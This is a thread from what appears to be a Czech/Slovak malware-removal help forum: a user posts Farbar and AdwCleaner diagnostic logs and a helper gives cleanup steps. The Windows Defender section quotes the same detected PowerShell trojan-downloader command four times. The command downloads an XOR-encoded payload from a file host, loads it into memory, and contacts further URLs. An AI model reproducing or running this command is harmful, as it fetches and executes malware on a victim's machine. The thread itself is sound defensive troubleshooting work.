FirewallRules: [{4E0915DD-85DC-4816-9616-A952C0C0C79C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1AB3D34D-2096-4639-A6F4-DB0021276C1B}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8D7038-61CD-44CF-88BD-3B4A6221113F}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6E0C9F16-EE9A-44B8-9451-7D5FB88A5D9D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{EB36692E-B7B2-42BD-BC9B-B5B9C427A112}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{2E494270-3352-4EE4-9BEB-DFDABEB0B492}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{CE8260C1-93C7-47AF-97D4-687806A341AB}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{41A0FD6F-32C7-4629-843F-F84BD1CF7F57}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [UDP Query User{F7DDB9BD-EF26-4906-BD31-A72205B5AFBB}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [TCP Query User{2996E712-43FC-4FF8-8202-BA352CC77FF9}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [UDP Query User{E5D79571-6F5B-47A0-BB49-86E0BBEFF6CD}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [{ECECF438-162A-4245-9BA1-DB6164C401DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
==================== Restore Points =========================
03-01-2021 20:48:22 Naplánovaný kontrolní bod
09-01-2021 18:42:24 Removed IQ Option
13-01-2021 21:32:33 Instalační služba modulů systému Windows
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (01/20/2021 08:00:00 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/19/2021 07:14:25 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/18/2021 01:04:48 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/17/2021 08:09:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/16/2021 07:48:31 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
System errors:
=============
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.
Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Windows Defender:
===================================
Date: 2021-01-20 18:14:17.7510000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2534.0, AS: 1.329.2534.0, NIS: 1.329.2534.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-20 17:09:21.2090000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2528.0, AS: 1.329.2528.0, NIS: 1.329.2528.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-20 15:18:54.2110000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {5BABBB36-9445-4077-8621-59FC0CF7C04A}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM
Date: 2021-01-20 11:15:09.7920000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2519.0, AS: 1.329.2519.0, NIS: 1.329.2519.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-20 10:29:02.0140000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2507.0, AS: 1.329.2507.0, NIS: 1.329.2507.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
==================== Memory info ===========================
BIOS: American Megatrends Inc. P1.30 05/25/2010
Motherboard: ASRock HM55-HT
Processor: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz
Percentage of memory in use: 72%
Total physical RAM: 3767.05 MB
Available physical RAM: 1051.44 MB
Total Virtual: 7351.05 MB
Available Virtual: 4661.58 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:111.19 GB) (Free:60.17 GB) NTFS
Drive d: (Místní disk) (Fixed) (Total:465.76 GB) (Free:230.27 GB) NTFS
Drive e: (HDD Záloha) (Fixed) (Total:465.76 GB) (Free:63.57 GB) NTFS
Drive g: (HDD SERIÁLY) (Fixed) (Total:1862.56 GB) (Free:76.56 GB) FAT32
\\?\Volume{89fed6d2-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{89fed6d2-0000-0000-0000-a0d21b000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 89FED6D2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=509 MB) - (Type=27)
==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: B5BDF682)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
==========================================================
Disk: 2 (Size: 1863 GB) (Disk ID: 055752AB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=0C)
==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: DD2566A6)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
==================== End of Addition.txt =======================
Re: Prosím o kontrolu logu
Dobry den.
Stiahnite si na plochu nastroj AdwCleaner, link. na stiahnutie tu: https://toolslib.net/downloads/finish/1/
Pred spustenim nastroja povypinajte vsetke beziace okna programov, to su vsetke beziace programy pod desktopom.
Kliknite pravym tlacidlom mysi na program -> spustit ako Administrator.
Pokracujte kliknutim na tlacidlo Prehladaj teraz (Scan now) a pockajte, kym sa system doskenuje.
Po skene nechajte oznacene vsetky chlieviky, pripadne najdene hrozieby a pokracujte v dolnom pravom rohu tlacidlom Vycistit Teraz (Clean and Repair).
Po restartovani PC sa spusti nastroj AdwCleaner, kliknite na Zobrazit soubor protokolu.
Spusti sa log, jeho obsah skopirujte sem.
Stiahnite si na plochu nastroj AdwCleaner, link. na stiahnutie tu: https://toolslib.net/downloads/finish/1/Pred spustenim nastroja povypinajte vsetke beziace okna programov, to su vsetke beziace programy pod desktopom.
Kliknite pravym tlacidlom mysi na program -> spustit ako Administrator.
Pokracujte kliknutim na tlacidlo Prehladaj teraz (Scan now) a pockajte, kym sa system doskenuje.
Po skene nechajte oznacene vsetky chlieviky, pripadne najdene hrozieby a pokracujte v dolnom pravom rohu tlacidlom Vycistit Teraz (Clean and Repair).
Po restartovani PC sa spusti nastroj AdwCleaner, kliknite na Zobrazit soubor protokolu.
Spusti sa log, jeho obsah skopirujte sem.
► Vyšla moja nová kniha BOTNETY! 
Informácie o nej nájdete tu: >> BOTNETY <<
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
---
Hľadáme nové posily do nášej CyberSecurity UNIT jednotky. Viac informácií o tom, čo to obnáša a ako sa pripojiť nájdete tu: >> CyberSecurity UNIT <<
----
► Nízkoúrovňový, Vysokoúrovňový programátor - profilová karta tu: card <<
----
► Háveťárna - UPLOAD Malwaru: >> upload <<
---
► Ak sa Vám ľúbi moja práca a ste sňou spokojný, môžete ma kontaktovať na: diallix@centrum.sk, info@diallix.net alebo diallix@forum.viry.cz .
---
Momentálne aktívny ako:
- konzultant, vývojár a tutor výskumu inteligentného malwaru.
- tutor v oblasti dotazovacích jazykoch SQL (TSQL, PLSQL), objektového programovania (c++,c#,php) pre študentov.
Na fóre pôsobím ako:
- Bezpečnostná autorita viry.cz
- Zástupca tutora pre vzdelávanie nováčikov
- Zakladateľ Cyber Security jednotky
Informácie o nej nájdete tu: >> BOTNETY << ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
---
Hľadáme nové posily do nášej CyberSecurity UNIT jednotky. Viac informácií o tom, čo to obnáša a ako sa pripojiť nájdete tu: >> CyberSecurity UNIT << ----
► Nízkoúrovňový, Vysokoúrovňový programátor - profilová karta tu: card <<
----
► Háveťárna - UPLOAD Malwaru: >> upload <<
---
► Ak sa Vám ľúbi moja práca a ste sňou spokojný, môžete ma kontaktovať na: diallix@centrum.sk, info@diallix.net alebo diallix@forum.viry.cz .
---
Momentálne aktívny ako:
- konzultant, vývojár a tutor výskumu inteligentného malwaru.
- tutor v oblasti dotazovacích jazykoch SQL (TSQL, PLSQL), objektového programovania (c++,c#,php) pre študentov.
Na fóre pôsobím ako:
- Bezpečnostná autorita viry.cz
- Zástupca tutora pre vzdelávanie nováčikov
- Zakladateľ Cyber Security jednotky
Re: Prosím o kontrolu logu
Tady je další log
# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build: 01-11-2021
# Database: 2021-01-11.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 01-20-2021
# Duration: 00:00:03
# OS: Windows 10 Pro
# Cleaned: 10
# Failed: 0
***** [ Services ] *****
No malicious services cleaned.
***** [ Folders ] *****
No malicious folders cleaned.
***** [ Files ] *****
No malicious files cleaned.
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
No malicious tasks cleaned.
***** [ Registry ] *****
No malicious registry entries cleaned.
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
Deleted BS Player Customized Web Search
Deleted MyStart Search
Deleted MyStart Search
Deleted Search the web (Babylon)
Deleted Search the web (Babylon)
Deleted WebSearch
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
***** [ Hosts File Entries ] *****
No malicious hosts file entries cleaned.
***** [ Preinstalled Software ] *****
No Preinstalled Software cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
AdwCleaner[S00].txt - [2186 octets] - [20/01/2021 16:59:03]
AdwCleaner[C00].txt - [2094 octets] - [20/01/2021 16:59:29]
AdwCleaner[S01].txt - [2027 octets] - [20/01/2021 17:10:25]
AdwCleaner[C01].txt - [2028 octets] - [20/01/2021 17:12:09]
AdwCleaner[S02].txt - [2149 octets] - [20/01/2021 19:08:48]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C02].txt ##########
# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build: 01-11-2021
# Database: 2021-01-11.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 01-20-2021
# Duration: 00:00:03
# OS: Windows 10 Pro
# Cleaned: 10
# Failed: 0
***** [ Services ] *****
No malicious services cleaned.
***** [ Folders ] *****
No malicious folders cleaned.
***** [ Files ] *****
No malicious files cleaned.
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
No malicious tasks cleaned.
***** [ Registry ] *****
No malicious registry entries cleaned.
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
Deleted BS Player Customized Web Search
Deleted MyStart Search
Deleted MyStart Search
Deleted Search the web (Babylon)
Deleted Search the web (Babylon)
Deleted WebSearch
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
***** [ Hosts File Entries ] *****
No malicious hosts file entries cleaned.
***** [ Preinstalled Software ] *****
No Preinstalled Software cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
AdwCleaner[S00].txt - [2186 octets] - [20/01/2021 16:59:03]
AdwCleaner[C00].txt - [2094 octets] - [20/01/2021 16:59:29]
AdwCleaner[S01].txt - [2027 octets] - [20/01/2021 17:10:25]
AdwCleaner[C01].txt - [2028 octets] - [20/01/2021 17:12:09]
AdwCleaner[S02].txt - [2149 octets] - [20/01/2021 19:08:48]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C02].txt ##########
Re: Prosím o kontrolu logu
Poprosim o nove logy FRST + ADDITION.
► Vyšla moja nová kniha BOTNETY! Informácie o nej nájdete tu: >> BOTNETY <<
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
---
Hľadáme nové posily do nášej CyberSecurity UNIT jednotky. Viac informácií o tom, čo to obnáša a ako sa pripojiť nájdete tu: >> CyberSecurity UNIT <<
----
► Nízkoúrovňový, Vysokoúrovňový programátor - profilová karta tu: card <<
----
► Háveťárna - UPLOAD Malwaru: >> upload <<
---
► Ak sa Vám ľúbi moja práca a ste sňou spokojný, môžete ma kontaktovať na: diallix@centrum.sk, info@diallix.net alebo diallix@forum.viry.cz .
---
Momentálne aktívny ako:
- konzultant, vývojár a tutor výskumu inteligentného malwaru.
- tutor v oblasti dotazovacích jazykoch SQL (TSQL, PLSQL), objektového programovania (c++,c#,php) pre študentov.
Na fóre pôsobím ako:
- Bezpečnostná autorita viry.cz
- Zástupca tutora pre vzdelávanie nováčikov
- Zakladateľ Cyber Security jednotky
Informácie o nej nájdete tu: >> BOTNETY << ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
---
Hľadáme nové posily do nášej CyberSecurity UNIT jednotky. Viac informácií o tom, čo to obnáša a ako sa pripojiť nájdete tu: >> CyberSecurity UNIT << ----
► Nízkoúrovňový, Vysokoúrovňový programátor - profilová karta tu: card <<
----
► Háveťárna - UPLOAD Malwaru: >> upload <<
---
► Ak sa Vám ľúbi moja práca a ste sňou spokojný, môžete ma kontaktovať na: diallix@centrum.sk, info@diallix.net alebo diallix@forum.viry.cz .
---
Momentálne aktívny ako:
- konzultant, vývojár a tutor výskumu inteligentného malwaru.
- tutor v oblasti dotazovacích jazykoch SQL (TSQL, PLSQL), objektového programovania (c++,c#,php) pre študentov.
Na fóre pôsobím ako:
- Bezpečnostná autorita viry.cz
- Zástupca tutora pre vzdelávanie nováčikov
- Zakladateľ Cyber Security jednotky
Re: Prosím o kontrolu logu
FRST log
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-01-2021
Ran by IRENA-PC (administrator) on IRENA-PC (20-01-2021 19:42:40)
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Platform: Windows 10 Pro Version 2004 19041.746 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Firebit OU -> Rainmeter) C:\Program Files\Rainmeter\Rainmeter.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Open Source Developer, Robin Krom -> Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies Inc. -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-01-28] (Open Source Developer, Robin Krom -> Greenshot)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Poslat do aplikace OneNote.lnk [2017-11-14]
ShortcutTarget: Poslat do aplikace OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rainmeter.lnk [2019-10-05]
ShortcutTarget: Rainmeter.lnk -> C:\Program Files\Rainmeter\Rainmeter.exe (Firebit OU -> Rainmeter)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0F781840-4995-487B-B8DB-7FF1EBC5C707} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-07] (Mozilla Corporation -> Mozilla Foundation)
Task: {10E62E26-1578-4A0E-8611-FFDA4C61A221} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {21567792-F593-4A2B-A8B0-FD12215C4505} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-09] (Goversoft LLC -> Goversoft LLC)
Task: {2765CE0A-1B19-47DC-BC12-CDD903EF335B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {64EFD4BD-F0D7-4F88-AE46-F5DA6CEA8254} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
